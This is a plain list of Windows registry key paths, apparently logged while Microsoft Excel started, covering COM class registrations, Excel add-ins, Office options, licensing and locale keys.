HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Storage.Streams.DataReader\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F1C46D71-B791-4110-8D5C-7108F22C1010}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{878F3F2A-34DB-42CE-A02B-D637B10A89FF}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SplashScreenLicense
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Sort
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\EnableLogging
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SmartList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\FontSmoothingThreshold
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\Tablet PC\IsTabletPC
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\OOBE\LaunchUserOOBE
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\NoOleLoadFromStreamChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\DiagnosticMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableComingSoon
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\OverridePointerMode
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.UI.ViewManagement.UIViewSettings\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{2E1271D5-2FF2-4EA4-9647-C67A82A2D85C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\ResetTabletModeOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PointerModeInitVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TurnOffPhotograph
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DeveloperTools
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Signals\Stats\Anonymous\Microsoft.Excel.Workbook\ClicksData
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\UseMockCollabCoordinator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInTableStyles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\HideBuiltInStyles
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663\Value
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\DeferredCheckDisabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingConfigurableSettings
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-SA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\he-IL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ur-PK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fa-IR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sd-Deva-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sd-Deva-IN
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\EnableApplicationFonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride\{C845E028-E091-442E-8202-21F596C559A0}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\NOFPU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Randomize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAltOOMError
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ScriptAnchorVis
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AddIns
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\ExcelPlugInShell.PowerMapConnect\Clsid\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{F39D01F3-69C1-45E1-93B2-7BF0BC6EB63E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\ExcelPlugInShell.PowerMapConnect\OverrideDefaultDisable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\LoadBehavior
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\FriendlyName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\RequireShutdownNotification
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\NativeShim.InquireConnector.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\NativeShim.InquireConnector.1\Clsid\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{237428F1-F2C7-4F86-B7ED-ADE148ACF95F}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Excel\Addins\NativeShim.InquireConnector.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\LoadBehavior
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Clsid\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{509E7382-B849-49A4-8A3F-BEAB7E7D904C}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\OverrideDefaultDisable
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\LoadBehavior
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\RequireShutdownNotification
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Manifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\CLSID\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\PowerPivotExcelClientAddIn.NativeEntry.1\Clsid\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{A2DBA3BE-42CC-4D0E-95FD-BCAA051BA798}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\Description
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\OverrideDefaultDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00024500-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OPEN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData\excel.exe
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefaultPath
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OpenDir
